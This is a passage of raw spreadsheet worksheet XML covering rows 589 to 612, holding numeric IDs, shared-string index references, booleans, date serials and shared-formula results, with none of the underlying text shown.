      <c r="K589" s="2" t="s">
        <v>2719</v>
      </c>
      <c r="L589" s="1">
        <v>7.0</v>
      </c>
      <c r="M589" s="1">
        <v>10.0</v>
      </c>
      <c r="N589" s="1" t="s">
        <v>2725</v>
      </c>
      <c r="O589" s="1" t="s">
        <v>2720</v>
      </c>
      <c r="P589" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q589" s="1">
        <f t="shared" si="1"/>
        <v>2</v>
      </c>
      <c r="R589" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S589" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="590">
      <c r="A590" s="1">
        <v>8526.0</v>
      </c>
      <c r="B590" s="2" t="s">
        <v>2726</v>
      </c>
      <c r="C590" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D590" s="2" t="s">
        <v>2727</v>
      </c>
      <c r="E590" s="2" t="s">
        <v>2241</v>
      </c>
      <c r="F590" s="1" t="s">
        <v>586</v>
      </c>
      <c r="G590" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H590" s="4">
        <v>44328.436111111114</v>
      </c>
      <c r="I590" s="1" t="s">
        <v>25</v>
      </c>
      <c r="J590" s="1" t="s">
        <v>2728</v>
      </c>
      <c r="K590" s="2" t="s">
        <v>2729</v>
      </c>
      <c r="L590" s="1">
        <v>2.0</v>
      </c>
      <c r="M590" s="1">
        <v>2.0</v>
      </c>
      <c r="N590" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O590" s="1" t="s">
        <v>2730</v>
      </c>
      <c r="P590" s="1" t="s">
        <v>369</v>
      </c>
      <c r="Q590" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R590" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S590" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="591">
      <c r="A591" s="1">
        <v>8528.0</v>
      </c>
      <c r="B591" s="2" t="s">
        <v>2731</v>
      </c>
      <c r="C591" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D591" s="2" t="s">
        <v>2732</v>
      </c>
      <c r="E591" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F591" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G591" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H591" s="1" t="s">
        <v>2733</v>
      </c>
      <c r="I591" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J591" s="1" t="s">
        <v>2734</v>
      </c>
      <c r="K591" s="2" t="s">
        <v>2735</v>
      </c>
      <c r="L591" s="1">
        <v>1.0</v>
      </c>
      <c r="M591" s="1">
        <v>1.0</v>
      </c>
      <c r="N591" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O591" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P591" s="1" t="s">
        <v>2736</v>
      </c>
      <c r="Q591" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R591" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S591" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="592">
      <c r="A592" s="1">
        <v>8690.0</v>
      </c>
      <c r="B592" s="2" t="s">
        <v>2737</v>
      </c>
      <c r="C592" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D592" s="2" t="s">
        <v>2738</v>
      </c>
      <c r="E592" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F592" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G592" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H592" s="1" t="s">
        <v>2739</v>
      </c>
      <c r="I592" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J592" s="1" t="s">
        <v>2740</v>
      </c>
      <c r="K592" s="2" t="s">
        <v>2741</v>
      </c>
      <c r="L592" s="1">
        <v>2.0</v>
      </c>
      <c r="M592" s="1">
        <v>2.0</v>
      </c>
      <c r="N592" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O592" s="1" t="s">
        <v>2742</v>
      </c>
      <c r="P592" s="1" t="s">
        <v>2743</v>
      </c>
      <c r="Q592" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R592" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S592" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="593">
      <c r="A593" s="1">
        <v>8691.0</v>
      </c>
      <c r="B593" s="2" t="s">
        <v>2744</v>
      </c>
      <c r="C593" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D593" s="2" t="s">
        <v>2745</v>
      </c>
      <c r="E593" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F593" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G593" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H593" s="4">
        <v>44357.03194444445</v>
      </c>
      <c r="I593" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J593" s="1" t="s">
        <v>2740</v>
      </c>
      <c r="K593" s="2" t="s">
        <v>2741</v>
      </c>
      <c r="L593" s="1">
        <v>2.0</v>
      </c>
      <c r="M593" s="1">
        <v>2.0</v>
      </c>
      <c r="N593" s="1" t="s">
        <v>2742</v>
      </c>
      <c r="O593" s="1" t="s">
        <v>2742</v>
      </c>
      <c r="P593" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q593" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R593" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S593" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="594">
      <c r="A594" s="1">
        <v>8698.0</v>
      </c>
      <c r="B594" s="2" t="s">
        <v>2746</v>
      </c>
      <c r="C594" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D594" s="2" t="s">
        <v>2747</v>
      </c>
      <c r="E594" s="2" t="s">
        <v>81</v>
      </c>
      <c r="F594" s="1" t="s">
        <v>159</v>
      </c>
      <c r="G594" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H594" s="1" t="s">
        <v>2748</v>
      </c>
      <c r="I594" s="1" t="s">
        <v>161</v>
      </c>
      <c r="J594" s="1" t="s">
        <v>2749</v>
      </c>
      <c r="K594" s="2" t="s">
        <v>2750</v>
      </c>
      <c r="L594" s="1">
        <v>1.0</v>
      </c>
      <c r="M594" s="1">
        <v>1.0</v>
      </c>
      <c r="N594" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O594" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P594" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q594" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R594" s="2">
        <f t="shared" si="2"/>
        <v>2</v>
      </c>
      <c r="S594" s="1">
        <f t="shared" si="3"/>
        <v>2</v>
      </c>
    </row>
    <row r="595">
      <c r="A595" s="1">
        <v>8808.0</v>
      </c>
      <c r="B595" s="2" t="s">
        <v>2751</v>
      </c>
      <c r="C595" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D595" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E595" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F595" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G595" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H595" s="1" t="s">
        <v>2753</v>
      </c>
      <c r="I595" s="1" t="s">
        <v>273</v>
      </c>
      <c r="J595" s="1" t="s">
        <v>2754</v>
      </c>
      <c r="K595" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L595" s="1">
        <v>2.0</v>
      </c>
      <c r="M595" s="1">
        <v>2.0</v>
      </c>
      <c r="N595" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O595" s="1" t="s">
        <v>2756</v>
      </c>
      <c r="P595" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q595" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R595" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S595" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="596">
      <c r="A596" s="1">
        <v>8809.0</v>
      </c>
      <c r="B596" s="2" t="s">
        <v>2751</v>
      </c>
      <c r="C596" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D596" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E596" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F596" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G596" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H596" s="1" t="s">
        <v>2757</v>
      </c>
      <c r="I596" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J596" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="K596" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L596" s="1">
        <v>5.0</v>
      </c>
      <c r="M596" s="1">
        <v>11.0</v>
      </c>
      <c r="N596" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O596" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="P596" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q596" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R596" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S596" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="597">
      <c r="A597" s="1">
        <v>8810.0</v>
      </c>
      <c r="B597" s="2" t="s">
        <v>2760</v>
      </c>
      <c r="C597" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D597" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E597" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F597" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G597" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H597" s="1" t="s">
        <v>2761</v>
      </c>
      <c r="I597" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J597" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="K597" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L597" s="1">
        <v>5.0</v>
      </c>
      <c r="M597" s="1">
        <v>11.0</v>
      </c>
      <c r="N597" s="1" t="s">
        <v>199</v>
      </c>
      <c r="O597" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="P597" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q597" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R597" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S597" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="598">
      <c r="A598" s="1">
        <v>8811.0</v>
      </c>
      <c r="B598" s="2" t="s">
        <v>2762</v>
      </c>
      <c r="C598" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D598" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E598" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F598" s="1" t="s">
        <v>182</v>
      </c>
      <c r="G598" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H598" s="1" t="s">
        <v>2763</v>
      </c>
      <c r="I598" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J598" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="K598" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L598" s="1">
        <v>5.0</v>
      </c>
      <c r="M598" s="1">
        <v>11.0</v>
      </c>
      <c r="N598" s="1" t="s">
        <v>205</v>
      </c>
      <c r="O598" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="P598" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q598" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R598" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S598" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="599">
      <c r="A599" s="1">
        <v>8813.0</v>
      </c>
      <c r="B599" s="2" t="s">
        <v>2764</v>
      </c>
      <c r="C599" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D599" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E599" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F599" s="1" t="s">
        <v>2765</v>
      </c>
      <c r="G599" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H599" s="1" t="s">
        <v>2766</v>
      </c>
      <c r="I599" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J599" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="K599" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L599" s="1">
        <v>5.0</v>
      </c>
      <c r="M599" s="1">
        <v>11.0</v>
      </c>
      <c r="N599" s="1" t="s">
        <v>2767</v>
      </c>
      <c r="O599" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="P599" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q599" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R599" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S599" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="600">
      <c r="A600" s="1">
        <v>8814.0</v>
      </c>
      <c r="B600" s="2" t="s">
        <v>2768</v>
      </c>
      <c r="C600" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D600" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E600" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F600" s="1" t="s">
        <v>2769</v>
      </c>
      <c r="G600" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H600" s="1" t="s">
        <v>2770</v>
      </c>
      <c r="I600" s="1" t="s">
        <v>220</v>
      </c>
      <c r="J600" s="1" t="s">
        <v>2758</v>
      </c>
      <c r="K600" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L600" s="1">
        <v>5.0</v>
      </c>
      <c r="M600" s="1">
        <v>11.0</v>
      </c>
      <c r="N600" s="1" t="s">
        <v>2771</v>
      </c>
      <c r="O600" s="1" t="s">
        <v>2759</v>
      </c>
      <c r="P600" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q600" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R600" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S600" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="601">
      <c r="A601" s="1">
        <v>8822.0</v>
      </c>
      <c r="B601" s="2" t="s">
        <v>2751</v>
      </c>
      <c r="C601" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D601" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E601" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F601" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G601" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H601" s="1" t="s">
        <v>2772</v>
      </c>
      <c r="I601" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J601" s="1" t="s">
        <v>2773</v>
      </c>
      <c r="K601" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L601" s="1">
        <v>1.0</v>
      </c>
      <c r="M601" s="1">
        <v>1.0</v>
      </c>
      <c r="N601" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O601" s="1" t="s">
        <v>132</v>
      </c>
      <c r="P601" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q601" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R601" s="2">
        <f t="shared" si="2"/>
        <v>5</v>
      </c>
      <c r="S601" s="1">
        <f t="shared" si="3"/>
        <v>5</v>
      </c>
    </row>
    <row r="602">
      <c r="A602" s="1">
        <v>8823.0</v>
      </c>
      <c r="B602" s="2" t="s">
        <v>2774</v>
      </c>
      <c r="C602" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D602" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E602" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F602" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G602" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H602" s="1" t="s">
        <v>2775</v>
      </c>
      <c r="I602" s="1" t="s">
        <v>2665</v>
      </c>
      <c r="J602" s="1" t="s">
        <v>2776</v>
      </c>
      <c r="K602" s="2" t="s">
        <v>2755</v>
      </c>
      <c r="L602" s="1">
        <v>2.0</v>
      </c>
      <c r="M602" s="1">
        <v>3.0</v>
      </c>
      <c r="N602" s="1" t="s">
        <v>2777</v>
      </c>
      <c r="O602" s="1" t="s">
        <v>2778</v>
      </c>
      <c r="P602" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q602" s="1">
        <f t="shared" si="1"/>
        <v>0</v>
      </c>
      <c r="R602" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S602" s="1">
        <f t="shared" si="3"/>
        <v>0</v>
      </c>
    </row>
    <row r="603">
      <c r="A603" s="1">
        <v>8825.0</v>
      </c>
      <c r="B603" s="2" t="s">
        <v>2779</v>
      </c>
      <c r="C603" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D603" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E603" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F603" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G603" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H603" s="1" t="s">
        <v>2780</v>
      </c>
      <c r="I603" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J603" s="1" t="s">
        <v>2781</v>
      </c>
      <c r="K603" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="L603" s="1">
        <v>6.0</v>
      </c>
      <c r="M603" s="1">
        <v>12.0</v>
      </c>
      <c r="N603" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O603" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="P603" s="1" t="s">
        <v>573</v>
      </c>
      <c r="Q603" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R603" s="2">
        <f t="shared" si="2"/>
        <v>7</v>
      </c>
      <c r="S603" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="604">
      <c r="A604" s="1">
        <v>8827.0</v>
      </c>
      <c r="B604" s="2" t="s">
        <v>2784</v>
      </c>
      <c r="C604" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D604" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E604" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F604" s="1" t="s">
        <v>703</v>
      </c>
      <c r="G604" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H604" s="1" t="s">
        <v>2785</v>
      </c>
      <c r="I604" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J604" s="1" t="s">
        <v>2781</v>
      </c>
      <c r="K604" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="L604" s="1">
        <v>6.0</v>
      </c>
      <c r="M604" s="1">
        <v>12.0</v>
      </c>
      <c r="N604" s="1" t="s">
        <v>2786</v>
      </c>
      <c r="O604" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="P604" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q604" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R604" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S604" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="605">
      <c r="A605" s="1">
        <v>8835.0</v>
      </c>
      <c r="B605" s="2" t="s">
        <v>2787</v>
      </c>
      <c r="C605" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D605" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E605" s="2" t="s">
        <v>51</v>
      </c>
      <c r="F605" s="1" t="s">
        <v>2788</v>
      </c>
      <c r="G605" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H605" s="1" t="s">
        <v>2789</v>
      </c>
      <c r="I605" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J605" s="1" t="s">
        <v>2781</v>
      </c>
      <c r="K605" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="L605" s="1">
        <v>6.0</v>
      </c>
      <c r="M605" s="1">
        <v>12.0</v>
      </c>
      <c r="N605" s="1" t="s">
        <v>2790</v>
      </c>
      <c r="O605" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="P605" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q605" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R605" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S605" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="606">
      <c r="A606" s="1">
        <v>8836.0</v>
      </c>
      <c r="B606" s="2" t="s">
        <v>2791</v>
      </c>
      <c r="C606" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D606" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E606" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F606" s="1" t="s">
        <v>2792</v>
      </c>
      <c r="G606" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H606" s="1" t="s">
        <v>2793</v>
      </c>
      <c r="I606" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J606" s="1" t="s">
        <v>2781</v>
      </c>
      <c r="K606" s="2" t="s">
        <v>2782</v>
      </c>
      <c r="L606" s="1">
        <v>6.0</v>
      </c>
      <c r="M606" s="1">
        <v>12.0</v>
      </c>
      <c r="N606" s="1" t="s">
        <v>2794</v>
      </c>
      <c r="O606" s="1" t="s">
        <v>2783</v>
      </c>
      <c r="P606" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q606" s="1">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R606" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S606" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="607">
      <c r="A607" s="1">
        <v>8844.0</v>
      </c>
      <c r="B607" s="2" t="s">
        <v>2795</v>
      </c>
      <c r="C607" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D607" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E607" s="2" t="s">
        <v>655</v>
      </c>
      <c r="F607" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G607" s="1" t="b">
        <v>1</v>
      </c>
      <c r="H607" s="1" t="s">
        <v>2796</v>
      </c>
      <c r="I607" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J607" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K607" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L607" s="1">
        <v>4.0</v>
      </c>
      <c r="M607" s="1">
        <v>11.0</v>
      </c>
      <c r="N607" s="1" t="s">
        <v>37</v>
      </c>
      <c r="O607" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P607" s="1" t="s">
        <v>393</v>
      </c>
      <c r="Q607" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R607" s="2">
        <f t="shared" si="2"/>
        <v>4</v>
      </c>
      <c r="S607" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="608">
      <c r="A608" s="1">
        <v>8845.0</v>
      </c>
      <c r="B608" s="2" t="s">
        <v>2800</v>
      </c>
      <c r="C608" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D608" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E608" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F608" s="1" t="s">
        <v>271</v>
      </c>
      <c r="G608" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H608" s="1" t="s">
        <v>2801</v>
      </c>
      <c r="I608" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J608" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K608" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L608" s="1">
        <v>4.0</v>
      </c>
      <c r="M608" s="1">
        <v>11.0</v>
      </c>
      <c r="N608" s="1" t="s">
        <v>2802</v>
      </c>
      <c r="O608" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P608" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q608" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R608" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S608" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="609">
      <c r="A609" s="1">
        <v>8846.0</v>
      </c>
      <c r="B609" s="2" t="s">
        <v>2803</v>
      </c>
      <c r="C609" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D609" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E609" s="2" t="s">
        <v>111</v>
      </c>
      <c r="F609" s="1" t="s">
        <v>2804</v>
      </c>
      <c r="G609" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H609" s="1" t="s">
        <v>2805</v>
      </c>
      <c r="I609" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J609" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K609" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L609" s="1">
        <v>4.0</v>
      </c>
      <c r="M609" s="1">
        <v>11.0</v>
      </c>
      <c r="N609" s="1" t="s">
        <v>949</v>
      </c>
      <c r="O609" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P609" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q609" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R609" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S609" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="610">
      <c r="A610" s="1">
        <v>8847.0</v>
      </c>
      <c r="B610" s="2" t="s">
        <v>2806</v>
      </c>
      <c r="C610" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D610" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E610" s="2" t="s">
        <v>242</v>
      </c>
      <c r="F610" s="1" t="s">
        <v>2807</v>
      </c>
      <c r="G610" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H610" s="1" t="s">
        <v>2808</v>
      </c>
      <c r="I610" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J610" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K610" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L610" s="1">
        <v>4.0</v>
      </c>
      <c r="M610" s="1">
        <v>11.0</v>
      </c>
      <c r="N610" s="1" t="s">
        <v>2809</v>
      </c>
      <c r="O610" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P610" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q610" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R610" s="2">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="S610" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="611">
      <c r="A611" s="1">
        <v>8849.0</v>
      </c>
      <c r="B611" s="2" t="s">
        <v>2810</v>
      </c>
      <c r="C611" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D611" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E611" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F611" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G611" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H611" s="1" t="s">
        <v>2811</v>
      </c>
      <c r="I611" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J611" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K611" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L611" s="1">
        <v>4.0</v>
      </c>
      <c r="M611" s="1">
        <v>11.0</v>
      </c>
      <c r="N611" s="1" t="s">
        <v>202</v>
      </c>
      <c r="O611" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P611" s="1" t="s">
        <v>66</v>
      </c>
      <c r="Q611" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R611" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S611" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
    <row r="612">
      <c r="A612" s="1">
        <v>8850.0</v>
      </c>
      <c r="B612" s="2" t="s">
        <v>2812</v>
      </c>
      <c r="C612" s="1" t="s">
        <v>20</v>
      </c>
      <c r="D612" s="2" t="s">
        <v>2752</v>
      </c>
      <c r="E612" s="2" t="s">
        <v>22</v>
      </c>
      <c r="F612" s="1" t="s">
        <v>1389</v>
      </c>
      <c r="G612" s="1" t="b">
        <v>0</v>
      </c>
      <c r="H612" s="1" t="s">
        <v>2813</v>
      </c>
      <c r="I612" s="1" t="s">
        <v>184</v>
      </c>
      <c r="J612" s="1" t="s">
        <v>2797</v>
      </c>
      <c r="K612" s="2" t="s">
        <v>2798</v>
      </c>
      <c r="L612" s="1">
        <v>4.0</v>
      </c>
      <c r="M612" s="1">
        <v>11.0</v>
      </c>
      <c r="N612" s="1" t="s">
        <v>2814</v>
      </c>
      <c r="O612" s="1" t="s">
        <v>2799</v>
      </c>
      <c r="P612" s="1" t="s">
        <v>30</v>
      </c>
      <c r="Q612" s="1">
        <f t="shared" si="1"/>
        <v>4</v>
      </c>
      <c r="R612" s="2">
        <f t="shared" si="2"/>
        <v>1</v>
      </c>
      <c r="S612" s="1">
        <f t="shared" si="3"/>
        <v>7</v>
      </c>
    </row>
